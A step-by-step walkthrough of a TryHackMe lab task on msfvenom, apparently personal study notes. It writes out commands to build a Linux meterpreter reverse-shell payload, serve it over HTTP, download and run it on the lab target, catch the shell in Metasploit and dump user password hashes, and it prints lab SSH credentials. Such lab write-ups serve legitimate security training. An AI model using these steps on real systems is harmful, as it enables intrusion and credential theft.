Msfvenom

https://tryhackme.com/room/metasploitexploitation task 6

This is a step by step for a task 6 Metasploit: Exploitation - Msfvenom

Step 1 - Accessing the Target Machine

We're given credentials to ssh into the target machine. As you can see in the picture, I have 4 tabs open ( CTRL+SHIFT+T to open a new tab). I'll always give the code to execute, a comment explaining what each command does and a screenshot where I'm doing the same thing. I recommend having 4 named and coloured tabs like I do. Imho it makes the whole process easier to follow. Any text after # is a comment and is grey

# In the Target Machine tab
# Use command ssh to connect to the target machine
ssh murphy@10.10.148.173
# When prompted, type yes to continue connecting
yes
# Enter password 
1q2w3e4r
# Type sudo su to get a root shell, this will give you privileges
sudo su
# Enter password again
1q2w3e4r
step 1 - Target Machine tab

Step 2 - Creating a reverse TCP shell Payload

# In the Attack Machine tab (green)
# Check port 7777 is not being used by any service. This isn't necessary, it's just a precaution
lsof -i :7777 # If port isn't used, nothing will happen. 
# Create a reverse_tcp payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.21.156.82 LPORT=7777 -f elf > rev_shell.elf
step 2 - Attack Machine

Step 3 - Creating a server

In the Server tab we start a simple python http server

#In the Server tab
#check port 9000 is not in use. This isn't necessary, it's just a precaution
lsof -i :9000 # If port isn't used, nothing will happen. 
#start the server with this command
python3 -m http.server 9000
step 3 - Server Tab

Step 4 - Transfering the payload

Download the payload from the server you set up in the last step

# In the Target Machine tab
# Download the payload in the Target Machine from the server using this command
wget http://10.21.156.82:9000/rev_shell.elf
# Use the chmod command to assign executable permissions
chmod +x rev_shell.elf
step 4 - Target Machine tab

In the Server tab, you'll see the successful GET request. No need to do anything here, it's just letting you know download was successfull.

step 4 - Server tab

Step 5 - Setting up a Payload Handler

In the msfconsole we'll configure and run the payload handler

# In the Msfconsole tab
# Start Metasploit Console
msfconsole
use linux/x86/meterpreter/reverse_tcp
show options
set lhost 10.21.156.82
set lport 7777
exploit
step 5 - Msfconsole tab

Step 6 - Executing the Payload

# In the Target Machine tab
# Execute the payload
./rev_shell.elf
Step 6 - Target Machine tab

In the Msfconsole tab we select the linux/gather/hashdump module, configure it and run it.

# In the Msfconsole tab
# Use post exploitation module to dump hashes of users on the system
use linux/gather/hashdump
# See the options
show options
# Check for session id
sessions
# Set the correct session id
set session 1
# Run it
exploit
# See the usernames:hashes
Step 6 - Msfconsole tab

Step 7 - Success

We're done

PreviousCommandsNextMoniker Link (CVE-2024-21413)

Last updated